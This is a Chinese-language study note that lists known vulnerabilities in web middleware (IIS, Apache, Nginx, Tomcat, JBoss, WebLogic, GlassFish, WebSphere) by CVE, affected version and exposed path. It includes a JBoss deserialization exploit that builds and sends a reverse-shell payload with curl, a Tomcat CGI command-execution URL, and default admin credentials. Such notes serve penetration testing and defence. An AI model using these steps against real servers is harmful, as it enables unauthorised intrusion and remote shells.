web中間件常見漏洞總結筆記

以前看吐司別人發的個文檔，簡單記的筆記

-----

IIS

    解析漏洞

       IIS 6

           *.asp;.jpg會被看成asp解析

           *.asp/目錄下的文件會被看成asp解析

           asa cdx cer後綴也會被看成asp解析

       IIS 7

           在Fast-CGI時,test.jpg在url後加/.php便可解析成php文件

    PUT任意文件寫入

       開啓了WebDAV並容許寫入

    IIS短文件漏洞

    CVE-2017-7269

       2003 r2 IIS 6 開啓WebDAV

---

Apache

    解析漏洞

       未知擴展名解析漏洞

           1.php.xxx

       AddHandler致使的解析漏洞

           若是有"AddHandler application/x-httpd-php .php",只要有.php後綴便可a.php.jpg

       HTTPD換行解析漏洞 CVE-2017-15715

           影響2.4.0-2.4.29

           上傳時文件名爲phpinfo.php換行符,訪問/phpinfo.php%0a

---

Nginx

    Nginx配置文件錯誤致使的解析漏洞

       info.jpg/1.php

    Nginx空字節任意代碼執行漏洞 0.5 0.6 0.7-0.7.65 0.8-0.8.37

       webshell名爲a.jpg 訪問a.jpg空字節.php

    Nginx文件名邏輯漏洞 0.8.41-1.4.3 1.5.0-1.5.7

       上傳時爲a.jpg空格,訪問a.jpg空格空字節.php

    Nginx配置錯誤致使的安全問題

       目錄穿越

           在配置別名時,忘記加/   訪問/files../

location /files {

   autoindex on;

   alias c:/WWW/home/;

}

        目錄遍歷 autoindex 爲on

---

Tomcat

    任意文件寫入CVE-2017-12615

       conf/web.xml配置了readonly=false,能夠往服務器PUT文件

    Tomcat遠程代碼執行 CVE-2019-0232

       9.0.0.M1 ~ 9.0.17, 8.5.0 ~ 8.5.39 ， 7.0.0 ~ 7.0.93

隨意上傳lxhsec.bat

 

http://127.0.0.1:8080/cgi-bin/lxhsec.bat?&C:/WINDOWS/system32/net+user

    Tomcat + 弱口令 && 後臺getshell漏洞

   Tomcat manager App 暴力破解

---

JBoss 默認端口8080 9990

    JBoss 5/6 反序列化漏洞 CVE-2017-12149

       訪問/invoker/readonly 返回500說明存在頁面

利用工具:JavaDeserH2HC,咱們選擇一個Gadget:ReverseShellCommonsCollectionsHashMap，編譯並生成序列化數據:

   生成ReverseShellCommonsCollectionsHashMap.class

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

   生成ReverseShellCommonsCollectionsHashMap.ser

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.31.232:6666(ip是nc所在的ip)

   利用:

curl http://192.168.31.205:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

    JBoss JMXInvokerServlet反序列化漏洞

       /invoker/JMXInvokerServlet

    JBoss EJBInvokerServlet反序列化漏洞

       /invoker/EJBInvokerServlet

    JBoss <=4.x JBossMQ JMS反序列化漏洞 CVE-2017-7504

       /jbossmq-httpil/HTTPServerILServlet

    Administration Console弱口令

       /admin-console/

    JMX Console未受權訪問

       /jmx-console/

---

WebLogic 默認端口7001

    XMLDecoder反序列化漏洞 CVE-2017-10271 & CVE-2017-3506

       /wls-wsat/

    wls9_async_response,wls-wsat反序列化漏洞 CVE-2019-2725

       /_async/

       /wls-wsat/

    WLS Core Components反序列化漏洞 CVE-2018-2628

        經過t3協議觸發

    WebLogic任意文件上傳漏洞 CVE-2018-2894 10.3.6.0 12.1.3.0, 12.2.1.2, 12.2.1.3

       /ws_utc/config.do

    Weblogic SSRF漏洞 CVE-2014-4210 10.0.2.0, 10.3.6.0

        /uddiexplorer/SearchPublicRegistries.jsp

    Weblogic弱口令後臺getshell

       /console

---

 

GlassFish 默認端口:8080(Web應用端口，即網站內容)，4848(GlassFish管理中心)

      GlassFish Directory Traversal(CVE-2017-1000028)    

       %c0%af做爲/ 直接訪問/META-INF下的敏感文件

    GlassFish 後臺Getshell    

---

 

 

WebSphere

    Java反序列化(CVE-2015-7450)

       訪問8880端口

    弱口令後臺getshell

       6/7版本,後臺只需輸入admin,無需密碼便可登陸 websphere/ websphere system/ manager